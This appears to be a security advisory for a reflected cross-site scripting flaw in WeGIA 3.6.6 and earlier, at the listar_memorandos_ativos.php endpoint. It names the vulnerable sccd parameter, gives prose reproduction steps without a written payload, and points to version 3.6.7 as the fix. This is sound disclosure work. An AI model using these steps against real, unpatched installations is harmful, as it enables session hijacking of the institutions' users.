WeGIA Reflected Cross-Site Scripting Vulnerability in listar_memorandos_ativos.php Endpoint

A reflected cross-site scripting vulnerability has been identified in WeGIA, a web management application for charitable institutions, in versions 3.6.6 and prior. The issue resides in the listar_memorandos_ativos.php endpoint, where the sccd GET parameter can be manipulated to inject arbitrary JavaScript or HTML. This unsanitized input is directly echoed in the HTML response, creating an opportunity for attackers to execute malicious scripts in the context of the user's browser session.

Impact

Exploitation of this vulnerability allows for reflected cross-site scripting, where an attacker's injected script is executed in the context of the user's session. This could lead to session hijacking, unauthorized administrative actions, or phishing attacks.

Reproduction

To reproduce this vulnerability, send a GET request to the listar_memorandos_ativos.php endpoint with the msg parameter set to 'success' and the sccd parameter containing the injected JavaScript or HTML payload. The absence of input sanitization will allow the injected content to be executed as a script in the user's browser.

Remediation

Users can upgrade to WeGIA version 3.6.7 to address this vulnerability.